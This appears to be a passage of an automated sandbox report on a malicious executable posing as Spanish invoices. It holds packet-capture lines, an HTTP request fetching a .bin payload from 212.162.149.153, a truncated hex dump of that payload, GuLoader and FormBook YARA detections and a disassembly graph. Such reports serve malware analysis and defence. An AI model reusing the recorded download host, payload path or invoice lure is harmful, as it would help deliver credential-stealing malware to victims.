                                Jan 10, 2025 07:05:27.410489082 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.410521984 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.410538912 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.410556078 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.410567999 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.410588980 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.410608053 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.410629034 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.410644054 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.410662889 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.410676956 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.410698891 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.410710096 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.410732985 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.410748005 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.410782099 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.411283970 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.411331892 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.411341906 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.411370993 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.411382914 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.411398888 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.411421061 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.411454916 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.455719948 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.455782890 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.455792904 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.455818892 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.455830097 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.455853939 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.455867052 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.455888987 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.455902100 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.455924988 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.455939054 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.455960035 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.455974102 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.455997944 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456008911 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456033945 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456047058 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456067085 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456084013 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456103086 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456120014 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456154108 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456201077 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456234932 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456250906 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456269026 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456279993 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456301928 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456315994 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456337929 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456351995 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456372976 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456387043 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456409931 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456419945 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456439018 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456459999 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456482887 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456598043 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456630945 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456646919 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456685066 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456686974 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456718922 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456733942 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456757069 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456769943 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456790924 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456803083 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456826925 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456839085 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456860065 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456886053 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456895113 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.456907034 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.456937075 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457098961 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457132101 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457148075 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457168102 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457182884 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457201958 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457216024 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457254887 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457256079 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457289934 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457303047 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457324982 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457339048 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457360029 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457375050 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457393885 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457406998 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457427979 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457439899 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457463980 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457478046 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457499981 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457515001 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457535028 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457549095 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457568884 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457585096 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457602978 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457618952 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457638979 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457653046 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457675934 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457689047 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457724094 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.457943916 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.457979918 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.458003044 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.458018064 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.458023071 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.458069086 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.492855072 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.492885113 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.492907047 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.492918968 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.492947102 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.492964029 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.492973089 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493006945 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493025064 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493041992 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493048906 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493089914 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493108034 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493160009 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493164062 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493211031 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493211031 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493244886 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493257046 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493279934 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493297100 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493313074 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493336916 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493346930 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493372917 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493392944 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493402004 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493437052 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493451118 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493470907 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493484020 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493505001 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493521929 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493545055 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493556023 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493597031 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493599892 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493632078 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493649006 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493665934 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493685007 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493700981 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493722916 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493733883 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493747950 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493769884 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493778944 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493805885 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493820906 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493861914 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.493963957 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.493997097 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.494023085 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.494033098 CET8049740212.162.149.153192.168.2.5
                                Jan 10, 2025 07:05:27.494048119 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:27.494086981 CET4974080192.168.2.5212.162.149.153
                                Jan 10, 2025 07:05:38.218430042 CET4974080192.168.2.5212.162.149.153

                                HTTP Request Dependency Graph

                                • 212.162.149.153

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.549740212.162.149.153805340C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                                TimestampBytes transferredDirectionData
                                Jan 10, 2025 07:05:26.581615925 CET184OUTGET /iXjlIFhRzlkjbZPQm185.bin HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                Host: 212.162.149.153
                                Cache-Control: no-cache
                                Jan 10, 2025 07:05:27.108809948 CET1236INHTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Last-Modified: Wed, 08 Jan 2025 10:34:20 GMT
                                Accept-Ranges: bytes
                                ETag: "baf81e0b861db1:0"
                                Server: Microsoft-IIS/8.5
                                Date: Fri, 10 Jan 2025 06:05:28 GMT
                                Content-Length: 287808
                                Data Raw: b5 7a 32 22 5e ed 4f 24 c4 b4 15 e6 fd 04 f7 13 f9 f0 8a c0 a0 e4 bd fc 30 f7 6e 7f 64 7f 48 e7 99 79 28 8a d2 b6 7f 6f 68 51 7f 36 97 69 29 3c 94 0b b9 f5 79 d7 d8 4c 37 2f ea a3 ba 9d b4 2c e2 1d 9b 63 ee c8 c8 1e 56 fc 49 a9 bc 01 3c b3 1d a1 24 82 b5 1d 2d e4 a0 8e c7 6d 47 21 a6 28 b8 54 73 85 d1 1d 20 50 e7 e3 6c 12 3f 20 c7 d4 07 94 34 87 17 94 82 e5 81 a5 14 e2 f1 5e 76 cc ee 24 49 a1 ee 03 85 c7 75 89 2f 75 89 34 b5 8a 2c 8e b5 74 87 0d 5f c3 0f 79 6c c2 ff fc 48 81 dc 41 b8 70 6c 26 b7 cd 81 a1 4a 9e 89 24 c7 69 68 a1 dc 64 0e 3c 24 77 79 4a fc 77 f3 a7 40 7c 03 df e4 c6 eb e1 f0 fb 57 6f 28 41 0d 7c f5 b4 d3 18 cc 09 77 90 c2 69 8f e7 d7 1a 2f ea d4 b5 29 93 3a 38 95 4f d2 67 13 58 c0 ad 87 88 96 29 9a 7f ea 97 94 2d d5 a5 c2 09 59 88 52 34 7a ce d2 e5 b2 4b 66 1a c0 6a 51 05 be 74 9a 84 f4 b4 fe 37 b4 b1 4b ee 2e 64 23 b2 6a 01 c8 a5 9f 17 7a a8 44 e8 89 70 a0 c3 05 a6 dd 2b 73 38 47 7a ad 44 0a 13 1e 95 9e d8 45 fc a7 8b 6d 1f 38 23 62 c7 78 2d f0 b4 69 55 1c 2a c9 25 06 41 91 66 de 8b [TRUNCATED]
                                Data Ascii: z2"^O$0ndHy(ohQ6i)<yL7/,cVI<$-mG!(Ts Pl? 4^v$Iu/u4,t_ylHApl&J$ihd<$wyJw@|Wo(A|wi/):8OgX)-YR4zKfjQt7K.d#jzDp+s8GzDEm8#bx-iU*%Af|=xd<Y"YKN}i[Wpd1(/%|E{1HitL$m+[>}Vk}u;xmfZ2`eW%L?GLjX~Xv,P^[{ v?8uV_wMM"o@2Q9S<i5?Q|u+M3MZlIa`K@YSGs/N$]v=[F2m%}DQhYx6(IEKY_~]C+O#{dB<Z*Ii_68}=B y&=Kg{W~(@Z^5pt`9/)tk;2LB@u>`08oyU0HrdBxbWDYhu7TocbDK++4h']5AFc?;2[I'Ha6!{{]S8GIepj?cD]0nm\J?&P:UJo/p'V?
                                Jan 10, 2025 07:05:27.108872890 CET1236INData Raw: e0 ec 79 af 07 e0 46 0e 50 4a d8 66 81 e2 31 d2 10 32 e2 5d f1 ed f9 9a 2d 6b df 59 cf a9 e6 91 d1 7e 3b e9 ed 7f a8 3e e1 d6 ac 78 72 0a d8 00 57 89 96 1c 0e d6 c7 3a db 9e 46 f1 33 5a e1 96 b4 90 aa 78 93 67 69 3d 09 30 54 6b f7 00 c2 71 d2 a9
                                Data Ascii: yFPJf12]-kY~;>xrW:F3Zxgi=0Tkq\R^{'BvIN~Fr:q~V0&}w}nLgAH~2mNW!Fcex^lbYx8:X~x UHf=gVU~Z<zflm_VYmoSa9`0=
                                Jan 10, 2025 07:05:27.108910084 CET1236INData Raw: 0e 37 85 e2 54 6f 63 16 c0 62 44 aa a2 db cb e9 4b d1 2b b0 1c 88 bf f8 be e6 d9 12 2b 18 c8 82 ca 99 a7 34 c9 c0 e9 cb 68 0c 27 5d c2 8e 35 00 41 b7 08 16 46 fb 63 3f 3b 10 32 5b 92 49 27 48 8d f6 ef 61 81 c4 92 1d fa f1 f9 e4 07 9f 36 21 ea 7b
                                Data Ascii: 7TocbDK++4h']5AFc?;2[I'Ha6!{{]S8GIepj?cD]0nm\J?&P:UJo/p'V?yFPJf12]-kY~;>xrW:F3Zxgi=0Tkq
                                Jan 10, 2025 07:05:27.108942986 CET1236INData Raw: 14 c3 c3 e5 16 64 da 42 ea 3c 5a d3 2a 49 69 5f 36 a3 38 7d 3d 42 20 c7 fb bd ed c1 82 79 26 19 f8 e3 3d 0a a2 e4 4b b0 67 89 d3 7b c2 57 9a d6 7e 9a 0f 28 40 15 1e 5a c5 bd 1d db 5e b9 35 ff 8d 03 f9 70 99 14 99 06 74 1d ff 60 96 e6 39 b5 db 04
                                Data Ascii: dB<Z*Ii_68}=B y&=Kg{W~(@Z^5pt`9/)tk;2LB@u>`08oyU0HrdBxbWDYhu7TocbDK++4h']5AFc?;2[I'Ha6!{
                                Jan 10, 2025 07:05:27.108982086 CET896INData Raw: a6 e2 7f dc b4 b9 8f 77 4d f6 b7 4a 40 32 06 91 a1 b1 5e 44 68 b6 a6 b2 de a9 09 b7 b3 f4 7c 20 a5 8b cb 08 c5 b9 f3 19 b8 ae 89 08 ef 2b f6 13 9c 87 98 53 ce ae 33 4d 1f 2f 6e b9 20 8b 28 15 bc 83 05 ed 3c 32 35 1d 53 de 1a 78 e8 ad ff 0a 2f bd
                                Data Ascii: wMJ@2^Dh| +S3M/n (<25Sx/~C-aNu"X0m,}DMhY#x6MMao,kXoKKcH3R$L?F|"*sd+Z_"fd}Q5H<o?Df"gZ4eAo(Z4^p=hA
                                Jan 10, 2025 07:05:27.146068096 CET1236INData Raw: 31 c8 b7 f0 d4 0e 4e 6c 32 c0 dc d5 d8 75 56 68 11 e3 eb 65 6e 97 66 16 dc 90 e7 62 95 4f 66 85 6e e1 71 41 9d f7 6f 65 6f d9 38 a9 e6 56 79 7f 70 8e 5d bc c5 ff af dd 6f ed c8 4b da 12 75 0c 45 00 75 ff 96 a6 a1 24 02 cc 18 65 67 28 72 87 18 46
                                Data Ascii: 1Nl2uVhenfbOfnqAoeo8Vyp]oKuEu$eg(rFb'Asl4cF@K+AeP&2RNA(rWLTGc{{-{@|f3,jOI;.hTb^j4Vo1-%hk(w_
                                Jan 10, 2025 07:05:27.146112919 CET224INData Raw: a3 c1 3b 8b ce d3 9c 6a ad 19 a0 c9 2f f8 1a 0c 03 b2 2a 24 cb 68 05 26 7c 1c 93 d4 39 35 bb 7b d7 22 a7 c8 08 d8 87 e0 5e 50 bf 8f 23 7d 08 5e a6 9d 89 32 c7 d9 9e f9 cc 1e e6 24 80 7f 2a 43 e5 13 e1 9a 77 4e 41 b6 82 54 bd 4b 2a 48 36 64 e0 bd
                                Data Ascii: ;j/*$h&|95{"^P#}^2$*CwNATK*H6d6qOA>3<K8=_>~)$-G!<OCa}0qY>r7yM8Nz-GOY'gt<LW"t3ODc
                                Jan 10, 2025 07:05:27.146151066 CET1236INData Raw: 42 1f b4 17 3f 62 64 5b 22 09 7f dc c4 fb e3 44 b2 86 7e 5c ae 27 3c 95 76 85 d1 96 6d 5c 62 2a 63 96 89 25 c7 d4 54 1f 69 97 9c 17 a6 e6 81 a5 27 61 21 5f 76 cc 6d 88 9b ae ee b7 b7 c2 5b bd b9 3c 44 15 5a a6 18 fd 95 89 91 46 38 09 51 d1 69 e2
                                Data Ascii: B?bd["D~\'<vm\b*c%Ti'a!_vm[<DZF8QiiyKy%kX1l2)}L?@|U!dOj0>2V9:BeKI;\&HYxG*f(Qz?9{Wj1`Hj+s~z4!w$7n
                                Jan 10, 2025 07:05:27.146188021 CET1236INData Raw: 74 9b e7 5a 86 fd 0e 42 0b 5d 63 42 44 9c bc b8 48 74 8f ea 7e 35 56 3a e5 da f8 e8 ab 61 ae 3c 4f e8 93 31 df b3 87 74 f3 94 de 78 33 a8 10 6f d3 cd 40 36 db fd 76 48 73 eb 8c 2d 35 3d cf 65 78 6a ec fc e1 d1 7a fc 3a 0a 05 06 ea 39 ad aa 6f aa
                                Data Ascii: tZB]cBDHt~5V:a<O1tx3o@6vHs-5=exjz:9oVhvW&wO6u|U>}FfddPv\z}j*BLC:cpRQpqgyf-mg. Pd'd"*cLzmwUq[xcpe9|L
                                Jan 10, 2025 07:05:27.146243095 CET448INData Raw: fb e2 75 a3 38 4c 73 62 e8 06 e6 77 08 ad b2 cb b2 62 e9 a8 06 c5 90 59 db 77 76 80 a6 50 3a 0e 20 55 01 f1 8b 8c d4 ff 32 81 a6 3d bd 0a 78 45 a8 15 92 3b a6 3c 7a 66 6c 18 7b 17 5f 99 91 cd a1 1c c0 f0 d7 73 5e c2 a4 20 59 ab 4c d1 3c 5c fa 39
                                Data Ascii: u8LsbwbYwvP: U2=xE;<zfl{_s^ YL<\9`9ooY5}xp/IB$"H3-95-gup\O28iYgZyLJ|/{uvU@;u5F3vlKPqC6JZQl6^d5l>\j
                                Jan 10, 2025 07:05:27.146280050 CET1236INData Raw: b2 69 40 64 31 db d7 a7 be c9 13 06 8a b5 41 a8 1e b5 ca 1a 1c f4 f6 a6 55 3a 47 8a a1 e8 f0 7c 37 cf 91 4e 7d ad 1d 2c 90 f4 13 64 9b 53 90 4d f4 43 8f c9 0e f2 3e 3e 2b e5 e5 21 a1 5f 34 f3 15 b2 42 87 75 fa b3 45 32 73 47 23 61 08 2a ef 66 4a
                                Data Ascii: i@d1AU:G|7N},dSMC>>+!_4BuE2sG#a*fJ@Da@+&X4m9-^|gmYDuW@S8 Vanjd<GrZZKsG8(/E{qq*+Lc^J[~,Vm*(us=;x^


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:01:04:58
                                Start date:10/01/2025
                                Path:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"
                                Imagebase:0x400000
                                File size:533'960 bytes
                                MD5 hash:4F2C796AEBD02A54CA9BEBB0C5BC5EF0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2241540149.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:3
                                Start time:01:05:22
                                Start date:10/01/2025
                                Path:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe"
                                Imagebase:0x400000
                                File size:533'960 bytes
                                MD5 hash:4F2C796AEBD02A54CA9BEBB0C5BC5EF0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2382836731.0000000032150000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:23.3%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:19.6%
                                  Total number of Nodes:1565
                                  Total number of Limit Nodes:40
                                  execution_graph 4931 734710c7 4943 734710f8 4931->4943 4932 734712be GlobalFree 4933 73471258 GlobalFree 4933->4943 4934 734711d7 GlobalAlloc 4934->4943 4935 734712ba 4935->4932 4936 73471548 3 API calls 4936->4943 4937 73471296 GlobalFree 4937->4943 4938 734715eb 2 API calls 4940 734711ca GlobalFree 4938->4940 4939 73471638 lstrcpyW 4942 734711ab GlobalFree 4939->4942 4940->4943 4941 73471165 GlobalAlloc 4941->4943 4942->4943 4943->4932 4943->4933 4943->4934 4943->4935 4943->4936 4943->4937 4943->4938 4943->4939 4943->4941 4944 73471cc7 4945 73471cee 4944->4945 4946 73471d2f GlobalFree 4945->4946 4947 73471d4e __alldvrm 4945->4947 4946->4947 4948 734715eb 2 API calls 4947->4948 4949 73471de5 GlobalFree GlobalFree 4948->4949 4950 401c41 4951 403002 17 API calls 4950->4951 4952 401c4a 4951->4952 4953 403002 17 API calls 4952->4953 4955 401c53 4953->4955 4957 4065fa wsprintfW 4955->4957 4956 401cdb 4957->4956 4958 734712c6 4961 7347101b 4958->4961 4968 7347156c 4961->4968 4963 73471020 4964 73471024 GlobalAlloc 4963->4964 4965 73471032 4963->4965 4964->4965 4966 734715c5 3 API calls 4965->4966 4967 73471038 4966->4967 4970 73471572 4968->4970 4969 73471578 4969->4963 4970->4969 4971 73471584 GlobalFree 4970->4971 4971->4963 4972 4024c2 4973 40303e 17 API calls 4972->4973 4974 4024c8 4973->4974 4975 40303e 17 API calls 4974->4975 4976 4024d1 4975->4976 4977 40303e 17 API calls 4976->4977 4978 4024da 4977->4978 4979 4065aa 2 API calls 4978->4979 4980 4024e2 4979->4980 4981 4024f3 lstrlenW lstrlenW 4980->4981 4982 405d15 24 API calls 4980->4982 4985 402ea1 4980->4985 4983 405d15 24 API calls 4981->4983 4982->4980 4984 40253a SHFileOperationW 4983->4984 4984->4980 4984->4985 4986 402b42 4987 402b48 4986->4987 4988 402b50 FindNextFileW 4987->4988 4989 4018be 4987->4989 4988->4989 4990 404ec7 4991 404ed7 4990->4991 4992 404efd 4990->4992 4993 4054f5 18 API calls 4991->4993 4994 405736 8 API calls 4992->4994 4995 404ee4 SetDlgItemTextW 4993->4995 4996 404f09 4994->4996 4995->4992 3865 402048 3873 403002 3865->3873 3867 40204e 3868 403002 17 API calls 3867->3868 3869 402057 3868->3869 3870 402061 ShowWindow 3869->3870 3871 40206c EnableWindow 3869->3871 3872 402ea1 3870->3872 3871->3872 3874 405e95 17 API calls 3873->3874 3875 403016 3874->3875 3875->3867 4997 401ecc 4998 403002 17 API calls 4997->4998 4999 401eda SetWindowLongW 4998->4999 5000 402ea1 4999->5000 4240 73471a4a 4241 73471aa1 4240->4241 4242 73471a5a VirtualProtect 4240->4242 4242->4241 4322 40234f 4323 40303e 17 API calls 4322->4323 4324 402356 4323->4324 4325 40303e 17 API calls 4324->4325 4326 402361 4325->4326 4327 40303e 17 API calls 4326->4327 4328 40236e 4327->4328 4329 40303e 17 API calls 4328->4329 4330 402379 4329->4330 